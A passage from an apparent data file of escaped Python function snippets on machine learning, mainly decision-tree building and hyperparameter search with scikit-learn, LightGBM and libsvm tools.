{\"entropy\": self.get_entropy,\n \"gini\": self.get_gini}.get(self.splitting_criteria)\n except KeyError:\n print(\"Program only supports entropy and gini as splitting criteria. Provided criteria was \" +\n self.splitting_criteria)\n raise ValueError(\"Incorrect parameter value passed for splitting criteria\")\n\n value_before_split = splitting_func(rows)\n\n if len(attribute_list) == 0 or value_before_split == 0:\n label_map = DecisionTree.get_count_by_attribute_value(rows, self.target_attribute)\n return DecisionTree.DecisionNode(label=DecisionTree.get_max_value_in_dictionary(label_map))\n\n if len(attribute_list) == 1 and attribute_list[0] == self.target_attribute:\n label_map = DecisionTree.get_count_by_attribute_value(parent_rows, self.target_attribute)\n return DecisionTree.DecisionNode(label=DecisionTree.get_max_value_in_dictionary(label_map))\n\n best_gain = -np.inf\n best_criteria = None\n best_attribute_partitions = None\n\n # Find the attribute having the best split \"\n\n best_attribute_partitions, best_criteria = self.get_best_attribute_for_split(attribute_list,\n best_attribute_partitions,\n best_criteria, best_gain,\n rows, splitting_func,\n value_before_split)\n branches = {}\n for domain_value in self.attribute_domains[best_criteria]:\n branch_attr_list = list(attribute_list)\n branch_attr_list.remove(best_criteria)\n if domain_value in best_attribute_partitions.keys():\n partition_dataset = best_attribute_partitions[domain_value]\n branches[domain_value] = self.build_tree(rows=partition_dataset,\n attribute_list=branch_attr_list,\n parent_rows=rows,\n depth=depth+1)\n else:\n branches[domain_value] = self.build_tree(rows=[],\n attribute_list=branch_attr_list,\n parent_rows=rows,\n depth=depth+1)\n return DecisionTree.DecisionNode(attribute_name=best_criteria, branches=branches)", "def model_3_parameters(num_features, num_classes, image_info):\n parameters = {}\n parameters['num_features'] = num_features\n parameters['num_classes'] = num_classes\n parameters['n_estimators'] = image_info['n_estimators']\n min_child_samples = image_info['min_child_samples']\n parameters['min_child_samples'] = min_child_samples\n \n # Parameters message\n with open(OUTPUT_FILE, 'a') as f:\n f.write(\"min_child_samples: {}\\n\\n\".format(min_child_samples))\n \n return parameters", "def search(x_data, y_data, n = 5):\r\n alpha = np.arange(0.01, 8, 0.01)\r\n param_grid = {'alpha' : alpha} \r\n clf = MultinomialNB() \r\n grid_search = GridSearchCV(clf, param_grid, cv=n)\r\n grid_search.fit(x_data, y_data)\r\n return grid_search.best_params_", "def findRFBestDepth():\n resultList = []\n BestScore = 0\n # iterate through different max_depths from 1 to 19\n for max_depth in range(1,20):\n rforest = ensemble.RandomForestClassifier(max_depth=max_depth, n_estimators=100)\n trainng_score = []\n testing_score = []\n # run 10 different cross-validation\n for index in range(10):\n # split into cross-validation sets.\n cv_data_train, cv_data_test, cv_target_train, cv_target_test = \\\n cross_validation.train_test_split(X_train, y_train, test_size=0.1)\n\n # fit the model using the cross-validation data\n # and tune parameter, such as max_depth here\n rforest = rforest.fit(cv_data_train, cv_target_train)\n trainng_score += [rforest.score(cv_data_train,cv_target_train)]\n testing_score += [rforest.score(cv_data_test,cv_target_test)]\n\n # Compute the average score for both traning and testing data\n trainng_avgScore = 1.0 * sum(trainng_score)/len(trainng_score)\n testing_avgScore = 1.0 * 
sum(testing_score)/len(testing_score)\n\n # find the best score\n if testing_avgScore > BestScore:\n BestScore = testing_avgScore\n best_depth = max_depth\n resultList += [[best_depth, trainng_avgScore, testing_avgScore]]\n print ('The best average score and the corresponding max_depth is: ')\n return BestScore, best_depth", "def brute_tree(XTRAIN,istopTRAIN,XTEST,istopTEST):\n \n ntrain=XTRAIN.shape[0]\n ntest=XTEST.shape[0]\n \n if np.sum(istopTRAIN)==0:\n return 0,[]\n\n cost0=np.zeros(Ngammas*Nreps)\n cost1=np.zeros(Ngammas*Nreps)\n cost0test=np.zeros(Ngammas*Nreps)\n cost1test=np.zeros(Ngammas*Nreps)\n \n precisionTRAIN=np.zeros(Ngammas*Nreps)\n precisionTEST=np.zeros(Ngammas*Nreps)\n recallTEST=np.zeros(Ngammas*Nreps)\n rate=np.zeros(Ngammas*Nreps)\n \n for iii in range(Ngammas):\n \n gamma=GAMMA[iii]\n \n for jjj in range(Nreps):\n \n \"\"\" train a tree using training data with random splitting \"\"\"\n \n tree_hyperparameters['class_weight']={0:1,1:gamma}\n clf=tree.DecisionTreeClassifier(**tree_hyperparameters)\n clf.fit(XTRAIN,istopTRAIN)\n \n \"\"\"\" record costs and precision on validation data \"\"\"\n \n pTRAIN=clf.predict(XTRAIN)\n precisionTRAIN[iii*Nreps+jjj]=np.divide(sum(1 for i in range(ntrain) if pTRAIN[i] == 1 and istopTRAIN[i]==1),sum(pTRAIN))\n cost0[iii*Nreps+jjj]=sum(1 for i in range(ntrain) if pTRAIN[i] == 1 and istopTRAIN[i]==0)\n cost1[iii*Nreps+jjj]=sum(1 for i in range(ntrain) if pTRAIN[i] == 0 and istopTRAIN[i]==1)\n \n \"\"\" record precision on test data \"\"\"\n \n pTEST=clf.predict(XTEST)\n precisionTEST[iii*Nreps+jjj]=np.divide(sum(1 for i in range(ntest) if pTEST[i] == 1 and istopTEST[i]==1),sum(pTEST))\n recallTEST[iii*Nreps+jjj]=sum(1 for i in range(ntest) if pTEST[i] == 1 and istopTEST[i]==1)/sum(istopTEST)\n cost0test[iii*Nreps+jjj]=sum(1 for i in range(ntest) if pTEST[i] == 1 and istopTEST[i]==0)\n cost1test[iii*Nreps+jjj]=sum(1 for i in range(ntest) if pTEST[i] == 0 and istopTEST[i]==1)\n \n \"\"\" record positive rate on full data \"\"\"\n \n rate[iii*Nreps+jjj]=(sum(pTRAIN)+sum(pTEST))/(ntrain+ntest)\n \n \"\"\" Compute Pareto front for validation data \"\"\"\n \n Pareto = Lower_Convex_Hull(np.concatenate((cost0.reshape(-1,1),cost1.reshape(-1,1)),1))\n \n \"\"\" make some nice plots for whoever is watching \"\"\"\n \n plt.figure(figsize=(10,5))\n plt.subplot(121)\n plt.plot(cost0,cost1,'.')\n plt.plot(cost0[Pareto],cost1[Pareto],'d')\n plt.xlabel('errors on class zero training data')\n plt.ylabel('errors on class one training data')\n\n plt.subplot(122)\n plt.plot(cost0test,cost1test,'.')\n plt.plot(cost0test[Pareto],cost1test[Pareto],'d')\n plt.xlabel('errors on class zero test data')\n plt.ylabel('errors on class one test data')\n plt.show()\n \n plt.figure(figsize=(15,5))\n plt.subplot(131)\n plt.semilogy(precisionTRAIN,rate,'.')\n plt.semilogy(precisionTRAIN[Pareto],rate[Pareto],'d')\n plt.xlabel('precision on training data')\n plt.ylabel('positive rate')\n\n plt.subplot(132) \n plt.semilogy(precisionTEST,rate,'.')\n plt.semilogy(precisionTEST[Pareto],rate[Pareto],'d')\n plt.xlabel('precision on test data')\n plt.ylabel('positive rate')\n\n plt.subplot(133) \n plt.plot(precisionTEST,recallTEST,'.')\n plt.plot(precisionTEST[Pareto],recallTEST[Pareto],'d')\n plt.xlabel('precision on test data')\n plt.ylabel('recall on test data')\n plt.show() \n \n return 
{'cost0':cost0,'cost1':cost1,'cost0test':cost0test,'cost1test':cost1test,'precisionTRAIN':precisionTRAIN,'precisionTEST':precisionTEST,'recallTEST':recallTEST,'rate':rate,'Pareto':Pareto}", "def showSolution(bestTree)->list:\r\n bestSon = bestTree\r\n solved = bestTree.value\r\n minDepth = bestTree.depth\r\n solution = []\r\n while bestSon.sons:\r\n #print(bestSon.state)\r\n solution.append(bestSon.state)\r\n bestSon = getBestSon(bestSon, minDepth)\r\n #print(bestSon.state)\r\n solution.append(bestSon.state)\r\n if solved == 1:\r\n #print(\"Minimum necessary total trips:\", bestSon.depth)\r\n solution.append(minDepth)\r\n else:\r\n solution.append(-1)\r\n return solution", "def find_best_k(x_train, y_train, ks):\n params = {'n_neighbors': ks}\n knn = neighbors.KNeighborsRegressor()\n model = GridSearchCV(knn, params, cv=5)\n model.fit(x_train, y_train)\n best_k = model.best_params_\n return best_k", "def hyperparameter_cv(X_data, y_data, hyperparameters):\n\n # Create Grid of hyperparameters\n grid = cartesian_product(hyperparameters)\n\n # Loop through hyperparameters \n best_score = 0\n for hyperparameter in grid:\n # Initialize Modle\n model = svm.SVC(kernel='linear', **hyperparameter)\n\n # Train and Get Accuracy\n print(f\"Training using hyperparameters: {hyperparameter}\")\n score = cross_validation_score(X_data, y_data, model, folds=5)\n print(f\"Accuracy Score: {score}\")\n\n if score > best_score:\n best_score = score\n best_parameters = hyperparameter\n \n return best_score, best_parameters", "def variable_ranking(self):\n self.grow_trees()\n dist_classes = self.dist_classes\n oob = self.forest.oob_set_generator()\n oob_length, First, elt_vals, var_vals = len(oob), True, {}, {}\n succ_rate, dist_succ_rate, dist_order = 0, 0, 0\n for var in self.variables:\n var_range = list(variable_range(self.data, var))\n range_len = len(var_range)\n print var\n permution = None\n permuted_succ, perm_dist_succ = 0, 0\n for elts in oob:\n if First:\n actual = self.data[elts][self.prediction_index]\n elt_vals[elts] = actual\n predicted = self.forest.test_predict(self.data[elts], elts)\n if actual in dist_classes:\n dist_order += 1\n if actual == predicted:\n succ_rate += 1\n if actual in dist_classes:\n dist_succ_rate += 1\n if var[1] == 'd':\n permution = int(math.floor(uniform(0, 1)*range_len))\n permution = var_range[permution]\n else:\n permution = uniform(0, 1)*(var_range[1] - var_range[0])\n perm_tuple = self.data[elts][:var[0]] + [permution] + self.data[elts][var[0]+1:]\n permuted_prediction = self.forest.predict(perm_tuple)\n actual = elt_vals[elts]\n if actual == permuted_prediction:\n permuted_succ += 1\n if actual in dist_classes:\n perm_dist_succ += 1\n if First:\n succ_rate = float(succ_rate)/oob_length\n dist_succ_rate = float(dist_succ_rate)/dist_order\n First = False\n permuted_succ = float(permuted_succ)/oob_length\n perm_dist_succ = float(perm_dist_succ)/dist_order\n print \"Originally a \", succ_rate, \" success rate, with permution to \", permuted_succ\n print \"A difference of \", succ_rate - permuted_succ\n print \"WRT Distinguised classes, a success rate of:\", dist_succ_rate, 'with permution to ', perm_dist_succ\n print \"A difference of \", dist_succ_rate - perm_dist_succ\n var_vals[var] = succ_rate - permuted_succ\n var_vals[(var, 'd')] = dist_succ_rate - perm_dist_succ\n var_vals = sorted(var_vals.items(), key=lambda x: x[1], reverse=True)\n for x in var_vals:\n print x[0], x[1]", "def hyper_parameter_test(elements, args):\n\n greedy_factors = np.linspace(\n 
args.greedy_start, args.greedy_end, args.greedy_num_samples\n )\n k_values = np.arange(args.k_start - 1, args.k_end, args.k_step) + 1\n k_values = [int(k) for k in k_values]\n if args.gc_prune_test:\n gc_prune = [True, False]\n else:\n gc_prune = [True]\n if args.forest:\n forest = [True, False]\n else:\n forest = [False]\n \n all_runs = {}\n factors = [p for p in product(forest, greedy_factors, k_values, gc_prune)]\n for factor in factors:\n all_runs[factor] = []\n all_signatures_used = []\n splitter = RepeatedKFold(args.n_split, args.n_repeat, random_state = args.random_seed)\n i = 0\n for tree_indexes, search_indexes in splitter.split(elements):\n print(\"current run number:\", i)\n i+=1\n tree_elems = elements[tree_indexes]\n search_elems = elements[search_indexes]\n \n if args.forest:\n forest = VPForest(\n tree_elems, random=args.random_vp, max_leaf_size=args.leaf_size\n )\n tree = VPTree(tree_elems, random=args.random_vp, max_leaf_size=args.leaf_size)\n tree_elem_names = [elem.identifier for elem in tree_elems]\n search_elem_names = [elem.identifier for elem in search_elems]\n all_signatures_used.append((tree_elem_names, search_elem_names))\n start = time.time()\n for factor in factors:\n if factor[0]:\n run_NNS = one_nn_search_run(forest, search_elems, factor, args.parallel)\n else:\n run_NNS = one_nn_search_run(tree, search_elems, factor, args.parallel)\n all_runs[factor].append(run_NNS)\n\n print(\"search time:\", time.time()-start)\n data = NNData(all_runs, all_signatures_used, factors)\n with open(args.o, \"wb\") as f:\n pickle.dump(data, f)", "def _find_rf_params(df, metrics):\n context = ramp.DataContext(data=df)\n config = ramp.Configuration(target=\"target\",\n features=[ramp.BaseFeature(x) for x in metrics])\n x, y = ramp.models.get_xy(config, context)\n\n n = len(metrics)\n param_grid = dict(max_features=range(int(math.ceil(math.sqrt(n))), n+1, 3),\n n_estimators=range(20, 101, 20))\n grid = sklearn.grid_search.GridSearchCV(sklearn.ensemble.RandomForestClassifier(),\n param_grid=param_grid,\n cv=sklearn.cross_validation.StratifiedKFold(y=y, k=3))\n grid.fit(x, y)\n print grid.best_estimator_\n out = {}\n for attr in param_grid.keys():\n out[attr] = getattr(grid.best_estimator_, attr)\n return out", "def buildTree(rows, maxDepth = None, scoref=entropy, depth = 0):\n #A base condition for the recursion. 
Check if this branch of a split has no data\n if len(rows)==0:\n return decisionNode( )\n newDepth = depth + 1 #Calculate the depth of the next split.\n #Check if the depth at the next split is greater than a maximum specified depth\n if (maxDepth == 0 or maxDepth) and (newDepth > maxDepth): \n return decisionNode(results=__uniqueCounts(rows)) #If so, stop splitting.\n current_score=scoref(rows) #Calculate the current value of the score function.\n # Set up some variables to track the best criteria\n best_gain=0.0 #Initialize a value for the best gain from all possible splits\n best_criteria=None #Initialize a variable for the best column to split on\n best_sets=None #Initialize a variable for the best split's true and false data.\n\n #Count the number of columns in the row, minus the results column \n column_count=len(rows[0])-1\n for col in range(0,column_count): #Iterate over all the columns of the data\n #Generate the list of different values in this column\n column_values={} #Initialize a dictionary to store the column values\n for row in rows: \n #Iterate over each row, adding a key in the dict for each observed value\n column_values[row[col]]=1\n # Divide the dataset on each value in this column.\n for value in column_values.keys( ):\n (set1,set2)=__divideset(rows,col,value)\n #Calculate the fraction of data in the true branch\n p=float(len(set1))/len(rows) \n #Calculate the gain on the chosen score function using this split.\n gain=current_score-p*scoref(set1)-(1-p)*scoref(set2) \n #Check if this split provides a better gain than the best previous split\n if gain>best_gain and len(set1)>0 and len(set2)>0:\n best_gain=gain\n best_criteria=(col,value)\n best_sets=(set1,set2)\n # Recursively create the subbranches\n if best_gain>0:\n trueBranch=buildTree(best_sets[0], maxDepth = maxDepth, depth = newDepth)\n falseBranch=buildTree(best_sets[1], maxDepth = maxDepth, depth = newDepth)\n return decisionNode(col=best_criteria[0],value=best_criteria[1],\n tb=trueBranch,fb=falseBranch)\n else:\n return decisionNode(results=__uniqueCounts(rows))", "def rand_optimize(self, X, y, n_iter=12, scoring='accuracy', cv=10, n_jobs=1, \n sample_params=False, min_params=2, get_params=False, random_state=None): \n get_key = (lambda name, i: name if i<2 else name+str(i-1))\n \n def search(clf, params): \n \n if not params:\n print(clf.name, 'No params')\n return (clf.estimator.fit(X, y), None)\n \n pars = params.copy() \n kwargs = {}\n if sample_params and (not get_params):\n kwargs = {'num_params': \n np.random.randint(min_params, len(pars)), \n 'mode': 'random'} \n elif get_params and (not sample_params) and clf.cv_params_to_tune:\n kwargs = {'keys': clf.cv_params_to_tune, \n 'mode': 'select'} \n \n pars = clf.set_tune_params(pars, **kwargs) if kwargs else pars \n niter = min(n_iter, clf.max_n_iter) \n \n randsearch = RandomizedSearchCV(clf.estimator, pars, \n n_iter=niter, scoring=scoring, cv=cv, \n n_jobs=n_jobs, random_state=random_state) \n fitted = False\n start = time.time()\n try:\n randsearch.fit(X, y)\n fitted = True\n except:\n print(clf.name, 'failed fit')\n print('error:', sys.exc_info()[1])\n return (clf.estimator.fit(X, y), None)\n else:\n print(clf.name, 'success')\n return (randsearch, randsearch.best_score_)\n \n finally:\n if self.verbose > 0 and fitted:\n delta = (time.time()-start)/60.0\n print(\"==== {} ==== \\n>>> Search time: {:.1f} (min) \\n>>> Best score: {:.4f}\"\n .format(clf.name, delta, randsearch.best_score_), end='\\n\\n') \n \n return {get_key(name, idx): search(clf, 
params) \n for name, clf in self.clf.items() for idx, params \n in enumerate(clf.cv_params, start=1)}", "def hyper_parameter_tuning(X, y, classifier, models, sntypes_map, feature_names, fig_dir='.', remove_models=(), name=''):\n\n # Hyperparameter grid\n n_estimators = [int(x) for x in np.linspace(start=200, stop=2000, num=10)]\n max_features = ['auto', 'sqrt']\n max_depth = [int(x) for x in np.linspace(10, 110, num=11)]\n max_depth.append(None)\n min_samples_split = [2, 5, 10]\n min_samples_leaf = [1, 2, 4]\n bootstrap = [True, False]\n random_grid = {'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'min_samples_split': min_samples_split,\n 'min_samples_leaf': min_samples_leaf,\n 'bootstrap': bootstrap}\n\n # Get data\n num_features = X.shape[1]\n model_names = [sntypes_map[model] for model in models]\n X, y, models, remove_models = remove_redundant_classes(X, y, models, remove_models)\n\n # Get best features\n n = 50\n num_features, feature_names, X = get_n_best_features(n, X, y, classifier, feature_names, num_features, fig_dir, name, models, model_names)\n\n # Randomised Search\n clf_random = RandomizedSearchCV(estimator=classifier, param_distributions=random_grid, n_iter=7, cv=3, verbose=2,\n random_state=42, n_jobs=2)\n clf_random.fit(X, y)\n print(clf_random.best_params_)\n\n def evaluate(model, test_features, test_labels):\n predictions = model.predict(test_features)\n errors = abs(predictions - test_labels)\n mape = 100 * np.mean(errors / test_labels)\n accuracy = 100 - mape\n print('Model Performance')\n print('Average Error: {:0.4f} degrees.'.format(np.mean(errors)))\n print('Accuracy = {:0.2f}%.'.format(accuracy))\n\n return accuracy\n\n best_random = clf_random.best_estimator_\n # random_accuracy = evaluate(best_random, test_features, test_labels)", "def fit_model(X, y,metric, model):\n cv_sets = ShuffleSplit(n_splits=10, test_size= 0.2, train_size= 0.8, random_state=42)\n \n\n if model == 'regression_tree':\n\n clf = DecisionTreeRegressor(random_state=42)\n\n # Creating a dictionary for the parameter 'max_depth' with a range from 1 to 10\n param = {\n 'max_depth': [1,2,3,4,5,6,7,8,9,10]\n }\n\n\n elif model == 'ridge':\n clf = Ridge(random_state=42, fit_intercept=False)\n param = {\n 'alpha': [0, 0.0001, 0.001, 0.01, 0.1, 1, 10, 100, 1000]\n }\n\n\n if metric == 'r2':\n scoring_fnc = make_scorer(r_squared,greater_is_better=True)\n\n elif metric == 'rss':\n scoring_fnc = make_scorer(rss, greater_is_better=False)\n\n # Creating the grid search cv object --> GridSearchCV()\n grid = GridSearchCV(estimator=clf, param_grid=param, cv=cv_sets,scoring= scoring_fnc)\n\n # Fit the grid search object to the data to compute the optimal model\n grid = grid.fit(X, y)\n\n # Return the optimal model after fitting the data\n return grid.best_estimator_", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"eAfb[0.6,-0.75,0.75]\");\n self.modelBuilder.doVar(\"eA0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doVar(\"rAfb[1.0,-5.0, 5.0]\");\n self.modelBuilder.doVar(\"rA0[1.0, -5.0, 5.0]\");\n self.modelBuilder.doSet(\"POI\",\"rAfb,rA0\")\n self.modelBuilder.factory_('expr::mAfb(\"@0*@1\",eAfb,rAfb)')\n self.modelBuilder.factory_('expr::mA0(\"(@0*@1)\",eA0,rA0)')\n\n \n self.modelBuilder.factory_('expr::eAlph(\"2.0*@0/(2.0-@0)\",eA0)')\n self.modelBuilder.factory_('expr::eNorm(\"3.0/4.0/(2.0+@0)\",eAlph)')\n self.modelBuilder.factory_('expr::eRAlph(\"@0*@1\",eAlph,eNorm)')\n self.modelBuilder.factory_('expr::eRpl(\"(@0+@1)\",eNorm,eAfb)')\n 
self.modelBuilder.factory_('expr::eRmn(\"(@0-@1)\",eNorm,eAfb)')\n\n self.modelBuilder.factory_('expr::mAlph(\"2.0*@0/(2.0-@0)\",mA0)')\n self.modelBuilder.factory_('expr::mNorm(\"3.0/4.0/(2.0+@0)\",mAlph)')\n self.modelBuilder.factory_('expr::mRAlph(\"@0*@1\",mAlph,mNorm)')\n self.modelBuilder.factory_('expr::mRpl(\"(@0+@1)\",mNorm,mAfb)')\n self.modelBuilder.factory_('expr::mRmn(\"(@0-@1)\",mNorm,mAfb)')", "def _search(self, node: Node, search_depth: int = 1) -> (float, list):\n if not node.children or search_depth == 0:\n return node.tot_reward / node.num_samples, []\n elif search_depth == 1:\n max_val = -math.inf\n max_actions = []\n for action, child in node.children.items():\n node_val = child.tot_reward / child.num_samples\n if node_val > max_val:\n max_val = node_val\n max_actions = [action]\n elif node_val == max_val:\n max_actions.append(action)\n max_action = random.choice(max_actions)\n child = node.children[max_action]\n return child.tot_reward / child.num_samples, [max_action]\n best_reward = -math.inf\n best_act_seq = []\n for action, child in node.children.items():\n child_reward, child_act_seq = self._search(child, search_depth - 1)\n if child_reward > best_reward:\n best_act_seq = [action] + child_act_seq\n best_reward = child_reward\n return best_reward, best_act_seq", "def DecisionTreeAlgorithm(df, mltask, counter = 0, min_samples = 2, max_depth = 5, random_subspace = None):\n\n if counter == 0:\n global COLUMN_HEADERS, FEATURE_TYPE\n COLUMN_HEADERS = df.columns\n FEATURE_TYPE = hf.determine_type_of_feature(df)\n data = df.values\n else:\n data = df\n \n if (check_purity(data)) or (len(data) < min_samples) or (counter == max_depth):\n leaf = create_leaf(data, mltask)\n return leaf\n \n else:\n counter += 1\n \n potential_splits = get_potential_split(data, random_subspace)\n split_column,split_value = determine_best_split(data, potential_splits, mltask)\n data_below,data_above = split_data(data,split_column,split_value)\n \n if (len(data_below) == 0) or (len(data_above) == 0):\n leaf = create_leaf(data, mltask)\n return leaf\n \n feature_name = COLUMN_HEADERS[split_column]\n type_of_feature = FEATURE_TYPE[split_column]\n if type_of_feature == 'continuous':\n question = '{} <= {}'.format(feature_name,split_value)\n else:\n question = '{} = {}'.format(feature_name,split_value)\n sub_tree = {question:[]}\n \n yes_answer = DecisionTreeAlgorithm(data_below, mltask, counter, min_samples, max_depth, random_subspace)\n no_answer = DecisionTreeAlgorithm(data_above, mltask, counter, min_samples, max_depth, random_subspace)\n \n if yes_answer == no_answer :\n sub_tree = yes_answer\n else :\n sub_tree[question].append(yes_answer)\n sub_tree[question].append(no_answer)\n \n return sub_tree", "def decision_tree(self, min_impurity_splits = None, is_voice_data = True):\n title = \"Learning Curves (Decision Tree - voice dataset)\"\n if not is_voice_data:\n title = \"Learning Curves (Decision Tree - EEG dataset)\"\n estimators = []\n for min_impurity_split in min_impurity_splits:\n estimator = tree.DecisionTreeClassifier(criterion=\"entropy\", \\\n min_impurity_split = min_impurity_split)\n estimators.append(estimator)\n\n # set colors: r -red, g- green, b - blue, m - magenta\n colors = [(\"r\", \"g\"), (\"b\", \"m\")] \n labels = [(\"Training accuracy (unpruned tree)\", \n \"Cross-validation accuracy (unpruned tree)\"),\n (\"Training accuracy (pruned tree)\", \n \"Cross-validation accuracy (pruned tree)\")]\n \n # Cross validation with 100 iterations to get smoother mean test and train\n 
# score curves, each time with 30% data randomly selected as a validation set.\n cv = cross_validation.ShuffleSplit(self.X.shape[0], n_iter=100,\n test_size=0.3, random_state=42)\n self.plot_learning_curve(estimators, title, labels, colors, self.X, self.y, \\\n cv=cv, n_jobs=4)\n \n # plot validation curve\n estimator_val = tree.DecisionTreeClassifier (criterion=\"entropy\") \n param_name = \"min_impurity_split\"\n x_label = \"Number of nodes in decision tree\"\n val_title = \"Validation Curve with Decision Tree (voice dataset)\"\n params =[i/100.0 for i in range(1,50)]\n if not is_voice_data:\n val_title = \"Validation Curve with Decision Tree (EEG dataset)\"\n params = np.logspace(-0.25, 0, 50)\n number_of_nodes = []\n for param in params:\n clf = tree.DecisionTreeClassifier(criterion=\"entropy\", min_impurity_split = param)\n clf.fit(self.X, self.y)\n number_of_nodes.append(clf.tree_.node_count)\n print number_of_nodes\n self.plot_validation_curve(estimator_val, params, param_name, self.X, \n self.y, val_title, xtricks = number_of_nodes, x_label = x_label,\n cv=cv, n_jobs = 4)\n plt.show()", "def select(self):\n\t\twarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n\t\tscore_best = float(\"inf\")\n\t\tbest_model = None\n\t\tfor numStates in range(self.min_n_components, self.max_n_components + 1):\n\t\t\ttry:\n\t\t\t\tmodel = self.base_model(numStates)\n\t\t\t\tlog_l = model.score(self.X, self.lengths)\n\t\t\t\tp = numStates\n\t\t\t\tlog_n = np.log(len(self.lengths))\n\t\t\t\tscore = -2 * log_l + p * log_n\n\t\t\t\tif score < score_best:\n\t\t\t\t\tscore_best = score\n\t\t\t\t\tbest_model = model\n\t\t\texcept Exception as e:\n\t\t\t\tpass\n\n\t\twhile best_model is None:\n\t\t\tbest_model = self.base_model(np.random.randint(self.min_n_components, self.max_n_components + 1))\n\n\t\treturn best_model", "def optimize(self, trial):\r\n num_leaves = trial.suggest_int(\"num_leaves\", 6, 50)\r\n min_child_samples = trial.suggest_int(\"min_child_samples\", 100, 500)\r\n min_child_weight = trial.suggest_uniform(\"min_child_weight\", 1, 7)\r\n subsample = trial.suggest_uniform(\"subsample\", 0.6, 1)\r\n colsample_bytree = trial.suggest_uniform(\"colsample_bytree\", 0.6, 1)\r\n reg_alpha = trial.suggest_uniform(\"reg_alpha\", 0.1, 100)\r\n reg_lambda = trial.suggest_uniform(\"reg_lambda\", 0.1, 100)\r\n\r\n model = LGBMRegressor(\r\n num_leaves=num_leaves,\r\n min_child_samples=min_child_samples,\r\n min_child_weight=min_child_weight,\r\n subsample=subsample,\r\n colsample_bytree=colsample_bytree,\r\n reg_alpha=reg_alpha,\r\n reg_lambda=reg_lambda,\r\n )\r\n\r\n model = ModelTrainer(file_object=self.file_object).get_trained_model(\r\n model, self.X_train, self.y_train\r\n )\r\n r_squared, rmse = ModelScorer(file_object=self.file_object).get_model_scores(\r\n model, self.X_test, self.y_test\r\n )\r\n\r\n return r_squared", "def get_winners(self):\n\n if self.optimal is not None:\n return self.optimal\n clean_proposals = self.cleaner.create_scenarios(self.proposals)\n self.optimal = self.optimizer.optimize(clean_proposals)\n return self.optimal", "def para_search(dname):\n if sys.platform != 'win32':\n grid_py = './PromoterSVM/libsvm/tools/grid.py'\n # gnuplot_exe = '/usr/bin/gnuplot'\n # svmtrain_exe = '../my-svm-train'\n else:\n grid_py = r'D:\\LiYuan\\\"Bioinformatic Research\"\\IMU\\zuo\\Tasks\\\"20160206-Promoter SVM\"\\biopromoter_script\\PromoterSVM\\libsvm\\tools\\grid.py'\n # gnuplot_exe = r\"D:\\Program Files\\gnuplot\\bin\\gnuplot.exe\"\n # svmtrain_exe = 
r'D:\\LiYuan\\\"Bioinformatic Research\"\\IMU\\zuo\\Tasks\\\"20160206-Promoter SVM\"\\biopromoter_script\\PromoterSVM\\libsvm\\windows\\my-svm-train.exe'\n\n ###################################\n # grid.py: find the best parameter(c,g), and generates a model file\n ###################################\n # cg_results = []\n cmd = \"{0} {1}\".format(grid_py, dname)\n print \"Cross Validating...\"\n grid_out = Popen(cmd, shell=True, stdout=PIPE).stdout\n\n print cmd\n print grid_out.readline()\n\n line = \"\"\n while True:\n last_line = line\n line = grid_out.readline()\n if not line:\n break\n c, g, cvrate = map(float, last_line.split())\n # cg_results.append('Best c={0}, g={1} CV rate={2}'.format(c,g,rate))\n\n print('Best c={0}, g={1} CV rate={2}'.format(c, g, cvrate))\n\n return c, g, cvrate", "def hyperparameter_optimization_random(X, y, *argv):\n\n clf_best_params = {}\n\n # Iterate over all (classifier, hyperparameters) pairs\n for clf, params in argv:\n\n # Run randomized search\n n_iter_search = 10\n random_search = RandomizedSearchCV(\n clf, param_distributions=params, n_iter=n_iter_search, cv=10, iid=False\n )\n random_search.fit(X, y)\n\n # Save results\n clf_best_params[clf] = random_search.best_params_\n\n return clf_best_params", "def fit(self, dataSet, prune=False, validSet=None):\n\t\t\n\t\tmodel_args = self._model_complexity_args.copy()\n\t\tif prune:\n\t\t\tif type(validSet).__name__ != 'ndarray':\n\t\t\t\traise AttributeError(\"To make pruning, validation set accept 'ndarray'\\\n\t\t\t\t\t, cannot be {}!\".format(type(validSet).__name__))\n\t\t\t# get a fully-grown tree\n\t\t\tmodel_args['min_impurity_decrease'] = 0\n\t\t\tmodel_args['min_samples_split'] = 2\n\t\t\n\t\tif self._treeType == 'reg':\n\t\t\timpurity_crit = DecisionTree._MSE\n\t\telif self._treeType == 'clf':\n\t\t\timpurity_crit = DecisionTree._Gini\n\n\n\t\telse:\n\t\t\traise ValueError(\"Argument 'treeType' accept 'clf' or 'reg' only\")\n\t\tself._root = DecisionTree._createTree(dataSet, impurity_crit=impurity_crit,\n\t\t\t\t\t\t\t\t\t\t\t**model_args)\n\n\t\tprint(\"Decision Tree Generated!\")\n\n\t\tif prune:\n\t\t\tprint(\"Pruning...\")\n\t\t\ttreeSeq = {'tree':[self._root], 'alpha':[0], 'num_leaves': [self._root.leaves()]} \n\t\t\tpruned_tree = DecisionTree._prune(deepcopy(self._root), impurity_crit, dataSet, treeSeq)\n\t\t\tprint('Pruning Done: %d pruned sub tree got' % len(treeSeq['tree']))\n\t\t\tprint('choosing best subtree through validation set...')\n\t\t\tbestSubtree, error_score = DecisionTree._bestSubtree(treeSeq, impurity_crit, validSet)\n\t\t\tprint('best subtree selected with error score: {}'.format(error_score))\n\n\t\t\tself._root = bestSubtree", "def get_parameter_estimation_parameters(self, friendly=True):\n #Get the sensitivities task:\n fitTask=self._getTask('parameterFitting')\n fitProblem = fitTask.find(xmlns + 'Problem')\n optimizationItems = fitProblem.find(xmlns + 'ParameterGroup')\n parameters = []\n for subGroup in optimizationItems:\n name = None\n lowerBound = None\n upperBound = None\n startValue = None\n \n for item in subGroup:\n if item.attrib['name'] == 'ObjectCN':\n name = item.attrib['value']\n elif item.attrib['name'] == 'UpperBound':\n upperBound = item.attrib['value']\n elif item.attrib['name'] == 'LowerBound':\n lowerBound = item.attrib['value']\n elif item.attrib['name'] == 'StartValue':\n startValue = item.attrib['value']\n assert name !=None\n assert lowerBound != None\n assert upperBound != None\n assert startValue != None\n \n if friendly:\n #Construct a 
